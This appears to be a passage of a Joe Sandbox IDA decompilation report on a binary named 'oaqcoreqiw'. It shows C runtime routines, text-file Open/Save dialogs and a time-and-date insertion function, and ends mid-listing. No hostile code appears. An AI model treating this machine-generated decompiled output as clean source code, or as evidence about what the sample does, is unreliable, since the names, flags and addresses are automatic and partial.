                                                  • Instruction ID: d4aedcfcff14dbf283d9147e3305e122552913258adb3f2100576e80a287de2f
                                                  • Opcode Fuzzy Hash: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
                                                  • Instruction Fuzzy Hash: 6601F531402302E6EB787FA8D9887DD7BE0AF24B12F5485AEE1D5AA0D0CF3685C0CE15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E010A7B33(void* __ebx, void* __edi) {
                                                  				void* __esi;
                                                  				void* _t3;
                                                  				intOrPtr _t6;
                                                  				long _t14;
                                                  				long* _t27;
                                                  
                                                  				E010A461A(_t3);
                                                  				if(E010A8983() != 0) {
                                                  					_t6 = E010A80A2(_t5, E010A7893);
                                                  					 *0x10c15a0 = _t6;
                                                  					__eflags = _t6 - 0xffffffff;
                                                  					if(_t6 == 0xffffffff) {
                                                  						goto L1;
                                                  					} else {
                                                  						_t27 = E010A8C83(1, 0x3b8);
                                                  						__eflags = _t27;
                                                  						if(_t27 == 0) {
                                                  							L6:
                                                  							E010A7BA9();
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						} else {
                                                  							__eflags = E010A80CC(_t9,  *0x10c15a0, _t27);
                                                  							if(__eflags == 0) {
                                                  								goto L6;
                                                  							} else {
                                                  								_push(0);
                                                  								_push(_t27);
                                                  								E010A7A87(__ebx, __edi, _t27, __eflags);
                                                  								_t14 = GetCurrentThreadId();
                                                  								_t27[1] = _t27[1] | 0xffffffff;
                                                  								 *_t27 = _t14;
                                                  								__eflags = 1;
                                                  								return 1;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					E010A7BA9();
                                                  					return 0;
                                                  				}
                                                  			}









                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 010A7B33
                                                    • Part of subcall function 010A461A: EncodePointer.KERNEL32(00000000,?,010A7B38,010A3D79,010BEFC0,00000014), ref: 010A461D
                                                    • Part of subcall function 010A461A: __initp_misc_winsig.LIBCMT ref: 010A463E
                                                  • __mtinitlocks.LIBCMT ref: 010A7B38
                                                    • Part of subcall function 010A8983: InitializeCriticalSectionAndSpinCount.KERNEL32(010C15B0,00000FA0,?,?,010A7B3D,010A3D79,010BEFC0,00000014), ref: 010A89A1
                                                  • __mtterm.LIBCMT ref: 010A7B41
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A889F
                                                    • Part of subcall function 010A7BA9: _free.LIBCMT ref: 010A88A6
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(010C15B0,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A88C8
                                                  • __calloc_crt.LIBCMT ref: 010A7B66
                                                  • __initptd.LIBCMT ref: 010A7B88
                                                  • GetCurrentThreadId.KERNEL32 ref: 010A7B8F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 757573777-0
                                                  • Opcode ID: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction ID: 7eb80ed30f49d0daac90950ce86de811a83d6e2ce3fd4cbae2d4194d1fdabfb5
                                                  • Opcode Fuzzy Hash: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction Fuzzy Hash: 23F0F6725A93135EE2743BF8BC02BDA76C48F212B2F98CB2AE2E0D50C0FF2280008540
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A16A0() {
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v60;
                                                  				WCHAR* _v64;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				intOrPtr _v88;
                                                  				struct tagOFNA _v92;
                                                  				short _v612;
                                                  				int _t24;
                                                  
                                                  				E010A66E0( &_v92, 0, 0x58);
                                                  				lstrcpyW( &_v612, L"*.txt");
                                                  				_v88 =  *0x10c3f24;
                                                  				_v84 =  *0x10c3f20;
                                                  				_v64 =  &_v612;
                                                  				_v92 = 0x58;
                                                  				_v80 = 0x10c47c4;
                                                  				_v60 = 0;
                                                  				_v40 = 0x881864;
                                                  				_v24 = E010A15A0;
                                                  				_v20 = 0x190;
                                                  				_v32 = L"txt";
                                                  				 *0x10c4c88 = 0;
                                                  				 *0x10c4c8c = 1;
                                                  				_t24 = GetOpenFileNameW( &_v92);
                                                  				if(_t24 != 0) {
                                                  					return E010A1140(_v64,  *0x10c4c88);
                                                  				}
                                                  				return _t24;
                                                  			}
















                                                  APIs
                                                  • _memset.LIBCMT ref: 010A16B1
                                                  • lstrcpyW.KERNEL32 ref: 010A16C5
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 010A172D
                                                    • Part of subcall function 010A1140: GetWindowTextLengthW.USER32 ref: 010A1153
                                                    • Part of subcall function 010A1140: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileLengthMessageNameOpenSendTextWindow_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 4227841899-3431318540
                                                  • Opcode ID: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction ID: 92d52003eed7d8680851fe337cb19797e5aff78e477e03f560248714daebb773
                                                  • Opcode Fuzzy Hash: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction Fuzzy Hash: 891117B4D0024C9FDB10DFE4E888BDEBBF8BB08304F004119E594AB284EBBA5548CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A1770() {
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v60;
                                                  				WCHAR* _v64;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				intOrPtr _v88;
                                                  				struct tagOFNA _v92;
                                                  				short _v612;
                                                  				signed int _t24;
                                                  
                                                  				E010A66E0( &_v92, 0, 0x58);
                                                  				lstrcpyW( &_v612, L"*.txt");
                                                  				_v88 =  *0x10c3f24;
                                                  				_v84 =  *0x10c3f20;
                                                  				_v64 =  &_v612;
                                                  				 *0x10c4c88 =  *0x10c47c0;
                                                  				_v92 = 0x58;
                                                  				_v80 = 0x10c47c4;
                                                  				_v60 = 0;
                                                  				_v40 = 0x880866;
                                                  				_v24 = E010A15A0;
                                                  				_v20 = 0x190;
                                                  				_v32 = L"txt";
                                                  				 *0x10c4c8c = 0;
                                                  				_t24 = GetSaveFileNameW( &_v92);
                                                  				asm("sbb eax, eax");
                                                  				return  ~( ~_t24);
                                                  			}
















                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 524411262-3431318540
                                                  • Opcode ID: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction ID: 40828d66436edc55ada890cdc79ebb65e4e918d35b8b62dc30c5eb75b4e12477
                                                  • Opcode Fuzzy Hash: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction Fuzzy Hash: CF01E9B4D4024D9FDB50DFE4E8897DEBBF8BB08704F004519E495EB284E77A55488F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E010B52E1(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t45;
                                                  				signed int _t46;
                                                  				signed int _t47;
                                                  				signed int _t50;
                                                  				signed int _t53;
                                                  				signed int _t54;
                                                  				signed int _t59;
                                                  				void* _t64;
                                                  				signed int _t66;
                                                  				void* _t68;
                                                  				signed int _t75;
                                                  				signed int _t79;
                                                  				signed short _t80;
                                                  				signed int _t82;
                                                  				void* _t83;
                                                  				signed int _t90;
                                                  				void* _t91;
                                                  				signed int _t92;
                                                  				signed int _t94;
                                                  				signed int* _t97;
                                                  
                                                  				_t46 = E010A732B(_t45);
                                                  				if(_t46 >= 0) {
                                                  					_t97 = _a8;
                                                  					_t47 = E010A66B0(_t97);
                                                  					_t79 = _t97[3];
                                                  					_t94 = _t47;
                                                  					__eflags = _t79 & 0x00000082;
                                                  					if((_t79 & 0x00000082) != 0) {
                                                  						__eflags = _t79 & 0x00000040;
                                                  						if((_t79 & 0x00000040) == 0) {
                                                  							_t75 = 0;
                                                  							__eflags = _t79 & 0x00000001;
                                                  							if((_t79 & 0x00000001) == 0) {
                                                  								L10:
                                                  								_t50 = _t97[3] & 0xffffffef | 0x00000002;
                                                  								_t97[3] = _t50;
                                                  								_t97[1] = _t75;
                                                  								__eflags = _t50 & 0x0000010c;
                                                  								if((_t50 & 0x0000010c) == 0) {
                                                  									_t64 = E010A4BEE();
                                                  									__eflags = _t97 - _t64 + 0x20;
                                                  									if(_t97 == _t64 + 0x20) {
                                                  										L13:
                                                  										_t66 = E010AE41E(_t94);
                                                  										__eflags = _t66;
                                                  										if(_t66 == 0) {
                                                  											goto L14;
                                                  										}
                                                  									} else {
                                                  										_t68 = E010A4BEE();
                                                  										__eflags = _t97 - _t68 + 0x40;
                                                  										if(_t97 != _t68 + 0x40) {
                                                  											L14:
                                                  											E010AE1D7(_t97);
                                                  										} else {
                                                  											goto L13;
                                                  										}
                                                  									}
                                                  								}
                                                  								__eflags = _t97[3] & 0x00000108;
                                                  								if(__eflags == 0) {
                                                  									_v12 = _a4;
                                                  									_push(2);
                                                  									_push( &_v12);
                                                  									_push(_t94);
                                                  									_v8 = 2;
                                                  									_t53 = E010A9CE9(_t75, _t91, _t94, _t97, __eflags);
                                                  									_t80 = _a4;
                                                  									_t75 = _t53;
                                                  									goto L27;
                                                  								} else {
                                                  									_t92 = _t97[2];
                                                  									 *_t97 = _t92 + 2;
                                                  									_t82 =  *_t97 - _t92;
                                                  									_v8 = _t82;
                                                  									_t97[1] = _t97[6] - 2;
                                                  									__eflags = _t82;
                                                  									if(__eflags <= 0) {
                                                  										__eflags = _t94 - 0xffffffff;
                                                  										if(_t94 == 0xffffffff) {
                                                  											L22:
                                                  											_t83 = 0x10c1560;
                                                  										} else {
                                                  											__eflags = _t94 - 0xfffffffe;
                                                  											if(_t94 == 0xfffffffe) {
                                                  												goto L22;
                                                  											} else {
                                                  												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t94 >> 5) * 4));
                                                  											}
                                                  										}
                                                  										__eflags =  *(_t83 + 4) & 0x00000020;
                                                  										if(__eflags == 0) {
                                                  											goto L25;
                                                  										} else {
                                                  											_push(2);
                                                  											_push(_t75);
                                                  											_push(_t75);
                                                  											_push(_t94);
                                                  											_t59 = E010A7180(_t75, _t94, _t97, __eflags);
                                                  											__eflags = (_t59 & _t92) - 0xffffffff;
                                                  											if((_t59 & _t92) == 0xffffffff) {
                                                  												goto L28;
                                                  											} else {
                                                  												goto L25;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_push(_t82);
                                                  										_push(_t92);
                                                  										_push(_t94);
                                                  										_t75 = E010A9CE9(_t75, _t92, _t94, _t97, __eflags);
                                                  										L25:
                                                  										_t80 = _a4;
                                                  										 *(_t97[2]) = _t80;
                                                  										L27:
                                                  										__eflags = _t75 - _v8;
                                                  										if(_t75 == _v8) {
                                                  											_t54 = _t80 & 0x0000ffff;
                                                  										} else {
                                                  											L28:
                                                  											_t43 =  &(_t97[3]);
                                                  											 *_t43 = _t97[3] | 0x00000020;
                                                  											__eflags =  *_t43;
                                                  											goto L29;
                                                  										}
                                                  									}
                                                  								}
                                                  							} else {
                                                  								_t97[1] = 0;
                                                  								__eflags = _t79 & 0x00000010;
                                                  								if((_t79 & 0x00000010) == 0) {
                                                  									_t97[3] = _t79 | 0x00000020;
                                                  									L29:
                                                  									_t54 = 0xffff;
                                                  								} else {
                                                  									_t90 = _t79 & 0xfffffffe;
                                                  									__eflags = _t90;
                                                  									 *_t97 = _t97[2];
                                                  									_t97[3] = _t90;
                                                  									goto L10;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							 *((intOrPtr*)(E010A6117())) = 0x22;
                                                  							goto L6;
                                                  						}
                                                  					} else {
                                                  						 *((intOrPtr*)(E010A6117())) = 9;
                                                  						L6:
                                                  						_t97[3] = _t97[3] | 0x00000020;
                                                  						_t54 = 0xffff;
                                                  					}
                                                  					return _t54;
                                                  				} else {
                                                  					return _t46 | 0xffffffff;
                                                  				}
                                                  			}

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B52E6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction ID: 833a5784a6de25f7adcfdf35e181e58674b31c7d8a2c3740963af601c17df2d7
                                                  • Opcode Fuzzy Hash: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction Fuzzy Hash: 1241D471601B069BD7249B6CCCC1AEE7BE4AF41324F08C6ADE5E6877D1E7B4E8408B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E010AB4EA(void* __eflags, signed char _a4, intOrPtr* _a8) {
                                                  				signed int _v8;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t43;
                                                  				signed int _t44;
                                                  				signed int _t45;
                                                  				signed int _t48;
                                                  				signed int _t52;
                                                  				void* _t60;
                                                  				signed int _t62;
                                                  				void* _t64;
                                                  				signed int _t67;
                                                  				signed int _t70;
                                                  				signed int _t74;
                                                  				signed int _t76;
                                                  				void* _t77;
                                                  				signed int _t85;
                                                  				void* _t86;
                                                  				signed int _t87;
                                                  				signed int _t89;
                                                  				intOrPtr* _t92;
                                                  
                                                  				_t44 = E010A732B(_t43);
                                                  				if(_t44 >= 0) {
                                                  					_t92 = _a8;
                                                  					_t45 = E010A66B0(_t92);
                                                  					_t2 = _t92 + 0xc; // 0x66ce7cf0
                                                  					_t74 =  *_t2;
                                                  					_t89 = _t45;
                                                  					__eflags = _t74 & 0x00000082;
                                                  					if((_t74 & 0x00000082) != 0) {
                                                  						__eflags = _t74 & 0x00000040;
                                                  						if((_t74 & 0x00000040) == 0) {
                                                  							_t70 = 0;
                                                  							__eflags = _t74 & 0x00000001;
                                                  							if((_t74 & 0x00000001) == 0) {
                                                  								L10:
                                                  								_t16 = _t92 + 0xc; // 0x66ce7cf0
                                                  								_t48 =  *_t16 & 0xffffffef | 0x00000002;
                                                  								 *(_t92 + 0xc) = _t48;
                                                  								 *(_t92 + 4) = _t70;
                                                  								__eflags = _t48 & 0x0000010c;
                                                  								if((_t48 & 0x0000010c) == 0) {
                                                  									_t60 = E010A4BEE();
                                                  									__eflags = _t92 - _t60 + 0x20;
                                                  									if(_t92 == _t60 + 0x20) {
                                                  										L13:
                                                  										_t62 = E010AE41E(_t89);
                                                  										__eflags = _t62;
                                                  										if(_t62 == 0) {
                                                  											goto L14;
                                                  										}
                                                  									} else {
                                                  										_t64 = E010A4BEE();
                                                  										__eflags = _t92 - _t64 + 0x40;
                                                  										if(_t92 != _t64 + 0x40) {
                                                  											L14:
                                                  											E010AE1D7(_t92);
                                                  										} else {
                                                  											goto L13;
                                                  										}
                                                  									}
                                                  								}
                                                  								__eflags =  *(_t92 + 0xc) & 0x00000108;
                                                  								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
                                                  									__eflags = 1;
                                                  									_push(1);
                                                  									_v8 = 1;
                                                  									_push( &_a4);
                                                  									_push(_t89);
                                                  									_t45 = E010A9CE9(_t70, _t86, _t89, _t92, 1);
                                                  									_t70 = _t45;
                                                  									goto L27;
                                                  								} else {
                                                  									_t24 = _t92 + 8; // 0x753b46c6
                                                  									_t87 =  *_t24;
                                                  									_t25 = _t87 + 1; // 0x753b46c7
                                                  									 *_t92 = _t25;
                                                  									_t26 = _t92 + 0x18; // 0x8b0d78fe
                                                  									_t76 =  *_t92 - _t87;
                                                  									_v8 = _t76;
                                                  									 *(_t92 + 4) =  *_t26 - 1;
                                                  									__eflags = _t76;
                                                  									if(__eflags <= 0) {
                                                  										__eflags = _t89 - 0xffffffff;
                                                  										if(_t89 == 0xffffffff) {
                                                  											L22:
                                                  											_t77 = 0x10c1560;
                                                  										} else {
                                                  											__eflags = _t89 - 0xfffffffe;
                                                  											if(_t89 == 0xfffffffe) {
                                                  												goto L22;
                                                  											} else {
                                                  												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t89 >> 5) * 4));
                                                  											}
                                                  										}
                                                  										__eflags =  *(_t77 + 4) & 0x00000020;
                                                  										if(__eflags == 0) {
                                                  											goto L25;
                                                  										} else {
                                                  											_push(2);
                                                  											_push(_t70);
                                                  											_push(_t70);
                                                  											_push(_t89);
                                                  											_t45 = E010A7180(_t70, _t89, _t92, __eflags) & _t87;
                                                  											__eflags = _t45 - 0xffffffff;
                                                  											if(_t45 == 0xffffffff) {
                                                  												goto L28;
                                                  											} else {
                                                  												goto L25;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_push(_t76);
                                                  										_push(_t87);
                                                  										_push(_t89);
                                                  										_t70 = E010A9CE9(_t70, _t87, _t89, _t92, __eflags);
                                                  										L25:
                                                  										_t35 = _t92 + 8; // 0x753b46c6
                                                  										_t45 = _a4;
                                                  										 *( *_t35) = _t45;
                                                  										L27:
                                                  										__eflags = _t70 - _v8;
                                                  										if(_t70 == _v8) {
                                                  											_t52 = _a4 & 0x000000ff;
                                                  										} else {
                                                  											L28:
                                                  											_t40 = _t92 + 0xc;
                                                  											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
                                                  											__eflags =  *_t40;
                                                  											goto L29;
                                                  										}
                                                  									}
                                                  								}
                                                  							} else {
                                                  								 *(_t92 + 4) = 0;
                                                  								__eflags = _t74 & 0x00000010;
                                                  								if((_t74 & 0x00000010) == 0) {
                                                  									 *(_t92 + 0xc) = _t74 | 0x00000020;
                                                  									L29:
                                                  									_t52 = _t45 | 0xffffffff;
                                                  								} else {
                                                  									_t14 = _t92 + 8; // 0x753b46c6
                                                  									_t85 = _t74 & 0xfffffffe;
                                                  									__eflags = _t85;
                                                  									 *_t92 =  *_t14;
                                                  									 *(_t92 + 0xc) = _t85;
                                                  									goto L10;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_t67 = E010A6117();
                                                  							 *_t67 = 0x22;
                                                  							goto L6;
                                                  						}
                                                  					} else {
                                                  						_t67 = E010A6117();
                                                  						 *_t67 = 9;
                                                  						L6:
                                                  						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
                                                  						_t52 = _t67 | 0xffffffff;
                                                  					}
                                                  					return _t52;
                                                  				} else {
                                                  					return _t44 | 0xffffffff;
                                                  				}
                                                  			}
                                                  0x010ab5ff
                                                  0x010ab605
                                                  0x010ab60a
                                                  0x010ab60d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010ab60d
                                                  0x010ab5b9
                                                  0x010ab5b9
                                                  0x010ab5ba
                                                  0x010ab5bb
                                                  0x010ab5c4
                                                  0x010ab60f
                                                  0x010ab60f
                                                  0x010ab612
                                                  0x010ab615
                                                  0x010ab62f
                                                  0x010ab62f
                                                  0x010ab632
                                                  0x010ab63d
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x00000000
                                                  0x010ab634
                                                  0x010ab632
                                                  0x010ab5b7
                                                  0x010ab543
                                                  0x010ab543
                                                  0x010ab546
                                                  0x010ab549
                                                  0x010ab5cb
                                                  0x010ab638
                                                  0x010ab638
                                                  0x010ab54b
                                                  0x010ab54b
                                                  0x010ab54e
                                                  0x010ab54e
                                                  0x010ab551
                                                  0x010ab553
                                                  0x00000000
                                                  0x010ab553
                                                  0x010ab549
                                                  0x010ab524
                                                  0x010ab524
                                                  0x010ab529
                                                  0x00000000
                                                  0x010ab529
                                                  0x010ab512
                                                  0x010ab512
                                                  0x010ab517
                                                  0x010ab52f
                                                  0x010ab52f
                                                  0x010ab533
                                                  0x010ab533
                                                  0x010ab645
                                                  0x010ab4f7
                                                  0x010ab4fb
                                                  0x010ab4fb

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010AB4EE
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction ID: a1bd2350afacca97252c58100902b6f9b40510d43ea01d561ca521fc01868a7b
                                                  • Opcode Fuzzy Hash: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction Fuzzy Hash: 3D41F1B1500B069ED7249FFDC891BBA7BE49F49330B88875DD9E6C72D1E678E8008B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A15A0(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                  				void* _v524;
                                                  				void* _t10;
                                                  				int _t16;
                                                  				void* _t18;
                                                  				struct HWND__* _t19;
                                                  				unsigned int _t23;
                                                  				long _t25;
                                                  
                                                  				_t10 = _a8 - 0x4e;
                                                  				if(_t10 == 0) {
                                                  					if( *((intOrPtr*)(_a16 + 8)) == 0xfffffda6 &&  *0x10c4c8c != 0) {
                                                  						SendMessageW(GetParent(_a4), 0x465, 0,  &_v524);
                                                  						_t16 = E010A14B0( &_v524);
                                                  						if(_t16 != 0xffffffff) {
                                                  							 *0x10c4c88 = _t16;
                                                  							SendMessageW( *0x10c2db0, 0x14e, _t16, 0);
                                                  						}
                                                  					}
                                                  					goto L11;
                                                  				} else {
                                                  					_t18 = _t10 - 0xc2;
                                                  					if(_t18 == 0) {
                                                  						_t19 = GetDlgItem(_a4, 0x191);
                                                  						 *0x10c2db0 = _t19;
                                                  						SendMessageW(_t19, 0x14e,  *0x10c4c88, 0);
                                                  						return 0;
                                                  					} else {
                                                  						if(_t18 != 1) {
                                                  							L11:
                                                  							return 0;
                                                  						} else {
                                                  							_t23 = _a12;
                                                  							if(_t23 != 0x191 || _t23 >> 0x10 != 1) {
                                                  								goto L11;
                                                  							} else {
                                                  								_t25 = SendMessageW( *0x10c2db0, 0x147, 0, 0);
                                                  								_t26 =  ==  ? 0 : _t25;
                                                  								 *0x10c4c88 =  ==  ? 0 : _t25;
                                                  								return 0;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}











                                                  APIs
                                                  • SendMessageW.USER32(00000147,00000000,00000000), ref: 010A15EF
                                                  • GetDlgItem.USER32 ref: 010A1612
                                                  • SendMessageW.USER32(00000000,0000014E,00000000), ref: 010A162B
                                                  • GetParent.USER32(FFFFFDA6), ref: 010A165F
                                                  • SendMessageW.USER32(00000000), ref: 010A1666
                                                  • SendMessageW.USER32(0000014E,00000000,00000000), ref: 010A168F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ItemParent
                                                  • String ID:
                                                  • API String ID: 2505470899-0
                                                  • Opcode ID: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction ID: 6df2e01c03821161c55812c6b3c2245439df1d4947eced577bd5f408d4baee9d
                                                  • Opcode Fuzzy Hash: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction Fuzzy Hash: 5A21C330200208AFEB709FB8DD89BA93BE4E708711F444652F9D8DA1E5EB7698508F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2150() {
                                                  				struct _SYSTEMTIME _v20;
                                                  				void* _v532;
                                                  
                                                  				GetLocalTime( &_v20);
                                                  				GetTimeFormatW(0x400, 2,  &_v20, 0,  &_v532, 0xff);
                                                  				SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
                                                  				SendMessageW( *0x10c3f2c, 0xc2, 1, " ");
                                                  				GetDateFormatW(0x400, 0,  &_v20, 0,  &_v532, 0xff);
                                                  				return SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
                                                  			}






                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000,0001FB2C), ref: 010A215E
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,000000FF), ref: 010A217D
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A219D
